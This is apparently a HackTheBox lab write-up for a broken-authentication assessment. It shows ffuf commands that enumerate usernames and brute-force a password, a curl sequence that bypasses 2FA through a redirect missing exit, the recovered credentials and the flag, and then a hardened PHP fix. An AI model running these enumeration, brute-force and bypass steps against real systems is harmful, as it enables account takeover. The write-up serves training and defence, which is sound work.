HTB Broken Authentication - Skills Assessment

Finding the flag for the Broken Authentication module

Walkthrough

Target: http://IP:PORT - MetaDocs web application

Vulnerabilities Found & Exploited

1. Username Enumeration (Information Disclosure)

The login page returns different error messages depending on whether a username exists:

  • Existing user, wrong password → “Invalid credentials.” (response size: 4344)
  • Non-existing user → “Unknown username or password.” (response size: 4353)

Used ffuf to enumerate usernames from the xato-net-10-million-usernames wordlist, filtering by response size:

ffuf -w xato-usernames.txt -u http://TARGET/login.php -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=FUZZ&password=Testpass12345" -fs 4353

Important: the password in the request had to match the password policy, otherwise the server responds differently.

Found user: gladys

2. Weak Password Policy → Password Brute-Force

The password policy (exactly 12 chars, upper+lower+digits, NO special chars) actually reduces the keyspace. Filtered rockyou.txt from 14M passwords down to ~17K:

grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' \
  | grep -E '^.{12}$' | grep -E '^[a-zA-Z0-9]+$' > custom_exact12.txt

Then brute-forced with ffuf:

ffuf -w custom_exact12.txt -u http://TARGET/login.php -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=gladys&password=FUZZ" -fr "Invalid credentials"

Found password: dWinaldasD13

3. 2FA Bypass via Direct Access (Authentication Bypass)

After logging in, gladys is redirected to 2fa.php for OTP verification. However, requesting profile.php directly returns a 302 redirect to 2fa.php, but the response body still contains the full page content, including the flag. The server renders the protected page before enforcing the redirect, a classic authentication bypass.

Login to get session:

SESSION=$(curl -s -i -X POST http://TARGET/login.php \
  -d "username=gladys&password=dWinaldasD13" | \
  grep "Set-Cookie: PHPSESSID" | head -1 | cut -d'=' -f2 | cut -d';' -f1)

Access profile.php directly:

curl -s -b "PHPSESSID=$SESSION" http://TARGET/profile.php

The response body contained: HTB{d86115e037388d0fa29280b737fd9171}
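The likely root cause of the 2FA bypass is a redirect issued without stopping script execution. The following is an added example, not the MetaDocs application's own code: it shows that vulnerable shape beside a hardened guard. The session key names ('user', 'otp_verified') are assumptions.

```php
<?php
// Added example, not the MetaDocs application's own code. It shows the
// redirect-without-exit pattern that produces the behaviour above (a 302
// together with a fully rendered body) next to a hardened guard.
// Session key names ('user', 'otp_verified') are assumptions.
session_start();

// --- Vulnerable shape of profile.php -------------------------------------
// header() only queues the response status line; execution continues, so
// the protected HTML below is still generated and sent with the 302.
/*
if (!isset($_SESSION['otp_verified'])) {
    header('Location: 2fa.php');          // missing exit
}
echo render_profile($_SESSION['user']);   // still runs: flag ends up in body
*/

// --- Hardened guard, included at the top of every post-2FA page ----------
function require_otp_verified(): void
{
    if (empty($_SESSION['user']) || empty($_SESSION['otp_verified'])) {
        // Discard anything buffered so far, send only the redirect, and stop.
        if (ob_get_level() > 0) {
            ob_end_clean();
        }
        header('Location: 2fa.php', true, 302);
        exit;
    }
}

function render_profile(string $user): string
{
    return '<h1>Profile of ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . '</h1>';
}

// 2fa.php must set $_SESSION['otp_verified'] = true only after the submitted
// OTP validates; login.php must leave it unset so the guard fails closed.
require_otp_verified();
echo render_profile($_SESSION['user']);
```

A quick regression check for the fix is that a 302 from profile.php without a verified session carries an empty body.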